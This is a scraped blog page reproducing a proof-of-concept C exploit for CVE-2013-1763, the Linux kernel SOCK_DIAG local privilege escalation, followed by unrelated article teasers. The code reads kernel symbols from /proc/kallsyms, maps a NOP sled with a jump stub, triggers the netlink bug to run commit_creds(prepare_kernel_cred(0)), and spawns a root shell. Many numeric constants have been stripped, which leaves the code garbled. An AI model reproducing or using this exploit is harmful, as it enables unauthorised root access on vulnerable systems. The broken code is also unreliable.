/*
* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
* bug found by Spender
* poc by SynQ
*
* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux
* using nl_table->hash.rehash_time, index 81
*
* Fedora 18 support added
*
* 2/2013
*/ #include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h> typedef int __attribute__((regparm())) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm())) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table; int __attribute__((regparm()))
kernel_code()
{
commit_creds(prepare_kernel_cred());
return -;
} int jump_payload_not_used(void *skb, void *nlh)
{
asm volatile (
"mov $kernel_code, %eax\n"
"call *%eax\n"
);
} unsigned long
get_symbol(char *name)
{
FILE *f;
unsigned long addr;
char dummy, sym[];
int ret = ; f = fopen("/proc/kallsyms", "r");
if (!f) {
return ;
} while (ret != EOF) {
ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
if (ret == ) {
fscanf(f, "%s\n", sym);
continue;
}
if (!strcmp(name, sym)) {
printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
fclose(f);
return addr;
}
}
fclose(f); return ;
} int main(int argc, char*argv[])
{
int fd;
unsigned family;
struct {
struct nlmsghdr nlh;
struct unix_diag_req r;
} req;
char buf[]; if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < ){
printf("Can't create sock diag socket\n");
return -;
} memset(&req, , sizeof(req));
req.nlh.nlmsg_len = sizeof(req);
req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
req.nlh.nlmsg_seq = ; //req.r.sdiag_family = 89;
req.r.udiag_states = -;
req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN; if(argc==){
printf("Run: %s Fedora|Ubuntu\n",argv[]);
return ;
}
else if(strcmp(argv[],"Fedora")==){
commit_creds = (_commit_creds) get_symbol("commit_creds");
prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
sock_diag_handlers = get_symbol("sock_diag_handlers");
nl_table = get_symbol("nl_table"); if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){
printf("some symbols are not available!\n");
exit();
} family = (nl_table - sock_diag_handlers) / ;
printf("family=%d\n",family);
req.r.sdiag_family = family; if(family>){
printf("nl_table is too far!\n");
exit();
}
}
else if(strcmp(argv[],"Ubuntu")==){
commit_creds = (_commit_creds) 0xc106bc60;
prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;
req.r.sdiag_family = ;
} unsigned long mmap_start, mmap_size;
mmap_start = 0x10000;
mmap_size = 0x120000;
printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size); if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -, ) == MAP_FAILED) {
printf("mmap fault\n");
exit();
}
memset((void*)mmap_start, 0x90, mmap_size); char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asm
unsigned long *asd = &jump[]; //把\x11\x11\x11\x11改成kernel_code
// commit_creds(prepare_kernel_cred(0));
*asd = (unsigned long)kernel_code; memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump)); //在end of mmap space塞入char jump[] if ( send(fd, &req, sizeof(req), ) < ) {
printf("bad send\n");
close(fd);
return -;
} printf("uid=%d, euid=%d\n",getuid(), geteuid() ); if(!getuid())
system("/bin/sh"); }

quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8的更多相关文章

  1. 8.3.2018 1 Quick and dirty 快而脏的快餐

    Quick and dirty  快而脏的快餐 BEIJING  北京 Food delivery is a booming business. Waste is piling up, too  送餐 ...

  2. Extjs4.x TreeGrid Dirty 更新数据,dirty标记不会自动清除的bug

    如上图所示,当修改某个属性值,成功提交后,dirty的小三角不会自动清除,这个是官方treegrid的一个bug,目前尚未解决. bug:http://www.sencha.com/forum/sho ...

  3. 一则利用内核漏洞获取root权限的案例【转】

    转自:https://blog.csdn.net/u014089131/article/details/73933649 目录(?)[-] 漏洞描述 漏洞的影响范围 漏洞曝光时间 漏洞产生的原因 漏洞 ...

  4. OpenSSL重大漏洞-Heartbleed之漏洞利用脚本POC讲解

    OpenSSL Security Advisory [07 Apr 2014] ======================================== TLS heartbeat read ...

  5. SharePoint 2013 对话框

    The quick way to open a sharepoint 2013 dialog modal form is via Javascript below 1 2 3 4 5 function ...

  6. 快速重启 Quick Boot plus

    Quick Boot(快速启动)可方便快速地重启/关闭您的设备,或将您的设备重启到恢复/引导模式,增强版还实现了热启动和Tasker/Locale插件集成功能.快速重启汉化版 Quick Boot p ...

  7. Golang优秀开源项目汇总, 10大流行Go语言开源项目, golang 开源项目全集(golang/go/wiki/Projects), GitHub上优秀的Go开源项目

    Golang优秀开源项目汇总(持续更新...)我把这个汇总放在github上了, 后面更新也会在github上更新. https://github.com/hackstoic/golang-open- ...

  8. WEB APPLICATION PENETRATION TESTING NOTES

    此文转载 XXE VALID USE CASE This is a nonmalicious example of how external entities are used: <?xml v ...

  9. MSI Error 1603 installing AppFabric 1.1 / Win7 x64

    MSI Error 1603 installing AppFabric 1.1 / Win7 x64  Archived Forums A-B > AppFabric Caching   先说解 ...

随机推荐

  1. flink-training-course

    目录 flink-training-course 大数据领域顶级盛会 Flink Forward Asia 2019 详情

  2. mybatis关联查询之一对多查询

    一对多,是最常见的一种设计.就是 A 表的一条记录,对应 B 表的多条记录,且 A 的主键作为 B 表的外键.这主要看以哪张表为中心,下面的测试数据中,从employee 表来看,一个员工对应一个部门 ...

  3. python随机生成个人信息

    python随机生成个人信息 #!/usr/bin/env python3 # -*- coding:utf-8 -*- import sys import random class Personal ...

  4. BZOJ 4003 (可并堆)

    题面 小铭铭最近获得了一副新的桌游,游戏中需要用 m 个骑士攻占 n 个城池. 这 n 个城池用 1 到 n 的整数表示.除 1 号城池外,城池 i 会受到另一座城池 fi 的管辖, 其中 fi &l ...

  5. Shell脚本中判断输入变量或者参数是否为空的方法

    shell判断一个变量是否为空方法总结 https://www.jb51.net/article/154835.htm 1.判断变量 复制代码代码如下: read -p "input a w ...

  6. 49-python基础-python3-列表-常用列表统计函数-max()-min()-sum()

    max() min() sum() 1-数字列表统计 实例: 2-字符串列表统计. 根据ASCII码大小统计字符串列表的min()和max(). 注意:sum()函数无法统计字符串列表. 实例:

  7. Ansible@一个高效的配置管理工具--Ansible configure management--翻译(三)

    未经书面许可.请勿转载 一张图简单概括 Simple Playbooks Ansible is useful as a command-line tool for making small chang ...

  8. ingress-nginx配置https文件访问

    1.先将证书文件上传至服务器特定目录.比如:/root/ssl 假设证书名称为:server.crt和server.key 2.现在主节点后台创建私密文件. kubectl create secret ...

  9. 发送xml数据

  10. 支持跨域的html元素

    image javascript iframe link